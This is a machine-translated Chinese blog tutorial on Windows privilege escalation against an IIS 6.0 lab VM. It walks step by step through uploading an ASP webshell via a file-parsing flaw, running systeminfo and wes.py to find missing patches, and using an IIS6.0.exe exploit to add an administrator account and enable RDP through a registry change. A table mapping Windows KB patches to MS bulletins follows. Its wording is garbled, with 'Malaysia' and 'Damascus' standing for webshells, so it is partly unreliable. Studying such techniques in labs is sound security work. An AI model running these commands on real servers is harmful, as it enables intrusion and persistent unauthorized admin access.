当前位置:网站首页>108. Network security penetration test - [privilege escalation 6] - [windows kernel overflow privilege escalation]
108. Network security penetration test - [privilege escalation 6] - [windows kernel overflow privilege escalation]
2022-07-07 11:56:00 【qwsn】
In my submission , Whether studying safety or engaging in safety , More or less, I have some feelings and sense of mission !!!
List of articles
One 、Windows IIS6.0 Spillover claims
1、Windos Introduction to power raising :
window Servers often use win2003、win2008 and win2012. In the penetration test , The permission we obtained is iis_user User group , To get higher permissions, you need to raise the current user to the system user or super administrator user group . Higher permissions facilitate our subsequent penetration , Extended range test .
2、 Comparison of program permissions :
stay iis Inside , The size of permissions in turn :aspx>php>=asp,aspx By default, it can execute terminal commands 、php and asp If the command cannot be executed , stay wscript.shell If the component is not deleted , Can be uploaded cmd To the executable directory to execute terminal commands .
3、 Exploit process :
(1) Experimental environment :
1. Target environment :
(1) virtual machine Windows2003【upload.moonteam.com】【192.168.97.132】
(2) Scripting language environment :php/asp/aspx Language environment exists
2. attack :
(1) virtual machine Win7【192.168.97.130】
(2)Firefox+Burpsuite+ Ant sword + Malaysia
3. The network environment :
(1)VMware Built NAT The Internet
(2) Target link :
URL:http://upload.moonteam.com/upload_6.php
(3) Experimental process :
First step : Visit the target link , After a series of tests , It turns out that this is IIS6.0 File parsing vulnerability , Therefore, you can upload Damascus through vulnerability characteristics .
The second step : Upload Malaysia 

The third step : Visit Malaysia http://upload.moonteam.com/upfile/heroes.asp;.jpg # The password of Malaysia is heroes
Step four : Click on [ Service information Component support ] modular , View the command execution component wscript.shell Whether the component is deleted 
Step five : Click on [RECYCLER] modular , To view the recycle bin directory .
Step six : Click on [ Upload file module ], To upload cmd.exe Go to the recycle bin directory .

Step seven : Click on [CMD perform ] modular , Then fill in SHELL Path and command to execute , Finally check WScriptShell Component and click to execute , Thus test cmd.exe Of whoami command .

Step eight : Click on [CMD perform ] modular , Carry out orders systeminfo, Save the results to the local systeminfo.txt.
Step nine : Using scripts wes.py, perform python wes.py systeminfo.txt > res.csv command , Get out of the hole , Save to res.csv
Step 10 : analysis res.csv, Search vulnerability , Find out CVE-2009-1535 Of IIS6.0 There are loopholes in rights raising 
Step 11 : Click on [ Upload file module ], To upload IIS6.0.exe Go to the recycle bin directory , But the upload failed , Here we go to upload a Damascus dedicated to uploading files , Then upload IIS6.0.exe


The twelfth step : Visit Malaysia ,http://upload.moonteam.com/upfile/up.aspx # password admin, Upload IIS6.0.exe Lift the right tool to the recycle bin directory 

Thirteenth Step : Back to the beginning of Malaysia , Get into [CMD perform ] modular , type C:\RECYCLER\IIS6.0.exe "whoami" # Pay attention to the format of executing the command 
The fourteenth step : Enter the following commands in turn , To create users demo1, Join the administrators group , Turn on 3389 port , Connect the target remotely .C:\RECYCLER\IIS6.0.exe "net user demo1 123 /add" # Add users 
C:\RECYCLER\IIS6.0.exe "net localgroup administrators demo1 /add" # Join the administrators group 
C:\RECYCLER\IIS6.0.exe "net user" # View created users 
C:\RECYCLER\IIS6.0.exe "netstat -ano" # Look at the open ports 
C:\RECYCLER\IIS6.0.exe "REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal\" \"Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f" # Turn on 3389
C:\RECYCLER\IIS6.0.exe "netstat -ano" # Look at the open ports 
The last step : type win+r, Input mstsc, Fill in the target ip, The account just created , So as to achieve the purpose of remote login .



attach 1: Some system vulnerabilities correspond to patch numbers
Win2003
KB2360937|MS10-084
KB2478960|MS11-014
KB2507938|MS11-056
KB2566454|MS11-062
KB2646524|MS12-003
KB2645640|MS12-009
KB2641653|MS12-018
KB944653|MS07-067
KB952004|MS09-012 PR
KB971657|MS09-041
KB2620712|MS11-097
KB2393802|MS11-011
KB942831|MS08-005
KB2503665|MS11-046
KB2592799|MS11-080
KB956572|MS09-012 barbecue
KB2621440|MS12-020
KB977165|MS10-015Ms Viru
KB3139914|MS16-032
KB3124280|MS16-016
KB3134228|MS16-014
KB3079904|MS15-097
KB3077657|MS15-077
KB3045171|MS15-051
KB3000061|MS14-058
KB2829361|MS13-046
KB2850851|MS13-053EPATHOBJ 0day limit 32 position
KB2707511|MS12-042 sysret -pid
KB2124261|KB2271195 MS10-065 IIS7
KB970483|MS09-020IIS6
Win2008
KB3139914|MS16-032
KB3124280|MS16-016
KB3134228|MS16-014
KB3079904|MS15-097
KB3077657|MS15-077
KB3045171|MS15-051
KB3000061|MS14-058
KB2829361|MS13-046
KB2850851|MS13-053EPATHOBJ 0day limit 32 position
KB2707511|MS12-042 sysret -pid
KB2124261|KB2271195 MS10-065 IIS7
KB970483|MS09-020IIS6
Win2012
KB3139914|MS16-032
KB3124280|MS16-016
KB3134228|MS16-014
KB3079904|MS15-097
KB3077657|MS15-077
KB3045171|MS15-051
KB3000061|MS14-058
KB2829361|MS13-046
KB2850851|MS13-053EPATHOBJ 0day limit 32 position
KB2707511|MS12-042 sysret -pid
KB2124261|KB2271195 MS10-065 IIS7
KB970483|MS09-020IIS6
attach 2:aspx Authority is higher than asp An example of

边栏推荐
- Various uses of vim are very practical. I learned and summarized them in my work
- . Net Maui performance improvement
- electron 添加 SQLite 数据库
- Use references
- What is cloud computing?
- Swiftui tutorial how to realize automatic scrolling function in 2 seconds
- How much do you know about excel formula?
- SwiftUI Swift 内功之如何在 Swift 中进行自动三角函数计算
- [filter tracking] strapdown inertial navigation pure inertial navigation solution matlab implementation
- In SQL, I want to set foreign keys. Why is this problem
猜你喜欢

Automated testing framework

Programming examples of stm32f1 and stm32subeide -315m super regenerative wireless remote control module drive

【滤波跟踪】基于matlab扩展卡尔曼滤波EKF和无迹卡尔曼滤波UKF比较【含Matlab源码 1933期】

请查收.NET MAUI 的最新学习资源

Flet教程之 15 GridView 基础入门(教程含源码)

There are so many factors that imprison you

总结了200道经典的机器学习面试题(附参考答案)

聊聊SOC启动(九) 为uboot 添加新的board

从工具升级为解决方案,有赞的新站位指向新价值

Technology sharing | packet capturing analysis TCP protocol
随机推荐
Zhou Yajin, a top safety scholar of Zhejiang University, is a curiosity driven activist
Rationaldmis2022 array workpiece measurement
Software design - "high cohesion and low coupling"
Flet教程之 19 VerticalDivider 分隔符组件 基础入门(教程含源码)
Neural approvals to conversational AI (1)
In SQL, I want to set foreign keys. Why is this problem
Improve application security through nonce field of play integrity API
超标量处理器设计 姚永斌 第10章 指令提交 摘录
《论文阅读》Neural Approaches to Conversational AI(1)
.NET MAUI 性能提升
Steps of redis installation and self startup configuration under CentOS system
Solve the problem that vscode can only open two tabs
Summed up 200 Classic machine learning interview questions (with reference answers)
Two week selection of tdengine community issues | phase II
Present pod information to the container through environment variables
【愚公系列】2022年7月 Go教学课程 005-变量
请查收.NET MAUI 的最新学习资源
【滤波跟踪】捷联惯导纯惯导解算matlab实现
R语言使用magick包的image_mosaic函数和image_flatten函数把多张图片堆叠在一起形成堆叠组合图像(Stack layers on top of each other)
一起探索云服务之云数据库